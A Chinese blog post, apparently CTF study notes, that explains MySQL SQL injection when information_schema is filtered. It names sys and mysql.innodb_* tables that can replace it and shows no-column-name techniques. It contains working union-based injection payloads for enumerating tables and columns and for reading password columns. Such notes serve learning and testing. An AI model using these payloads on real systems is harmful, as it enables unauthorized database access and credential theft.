• information_schema过滤与无列名注入


    前言:

    做题时 遇到了些问题,所以记录下笔记。

    在手工SQL注入时 information_schema 库 被过滤了怎么办?

    正文:

    mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

    在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

    这些数据库内的信息。

    那么有没有代替information_schema的呢?

    在 Mysql 5.7 版本中新增了 sys.schema , 基础数据 来自于 performance_schema和information_sche两个库中,其本身并不存储数据。

    所以 就有了几个可以代替 information_schema 注入的作用,

     查询表的统计信息,其中还包括Innodb缓冲池统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间)降序排序

    sys.schema_table_statistics_with_buffer
    sys.x$schema_table_statistics_with_buffer

     但是 sys.schema_auto_increment_columns 这个库有点局限 需要root 才能访问。

    类似的,可以利用的表还有 :

    mysql.innodb_table_statsmysql.innodb_table_index同样存放有库名表名

     成功查询到。

    总结一下:

    sys.schema_auto_increment_columns 

    sys.schema_table_statistics_with_buffer

    mysql.innodb_table_stats

    mysql.innodb_table_index

    均可代替 information_schema

    无列名注入:

    上面的方法 可以读取到数据库 和 表名, 但是列名我们改怎么读取。

    利用 join-using 注列名。

    通过系统关键字 join 可建立两表之间的内连接,通过对想要查询列名所在的表与其自身

    1. 爆表名
    2. ?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
    3. ?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+
    4. 爆字段名
    5. 获取第一列的字段名及后面每一列字段名
    6. ?id=-1' union select*from (select * from users as a join users as b)as c--+
    7. ?id=-1' union select*from (select * from users as a join users b using(id,username))c--+
    8. ?id=-1' union select*from (select * from users as a join users b using(id,username,password))c--+
    9. 数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。

     

    正常查询

     select 1,2,3,4,5 union select * from users;
    无列名注入关键 就是要猜测表里有多少个列,要一一对应上,上面例子是有5个列
    1,2,3,4,5 的作用就是对列起别名,替换为后面无列名注入做准备

     接着就可以使用数字来对应列进行查询,如3对应了表里面的pass
    select `3` from (select 1,2,3,4,5 union select * from users)as a;
    就相当于select pass from (select 1,2,3,4,5 union select * from users)as a;
    SQL 中反引号是可以代表数据库名和列名的
    (select 1,2,3,4,5 union select * from users)as a 把括号里的查询数据重命名一张新的表 a,在从中查询

     当反引号被禁用时,就可以使用起别名的方法来代替
    select b from (select 1,2, 3 as b ,4,5 union select * from users)as a;
    在注入时同时查询多个列
    select group_concat(b,c) from (select 1,2, 3 as b , 4 as c ,5 union select * from users)as a;

     

  • 相关阅读:
    大数据之Flink优化
    【c语言】-指针进阶(下)
    基于Expression Lambda表达式树的通用复杂动态查询构建器——《原型篇一》[已开源]
    《股票大作手回忆录》读书
    【前端面试考点】
    简单开发调用百度翻译api(java)
    C++ 多态
    基于lstm DNN的多变量单变量时间预测项目-完整数据+代码
    【安卓开发】安卓按键响应
    探索网络世界:常见应用程序详解与实战演练
  • 原文地址:https://blog.csdn.net/snowlyzz/article/details/126727255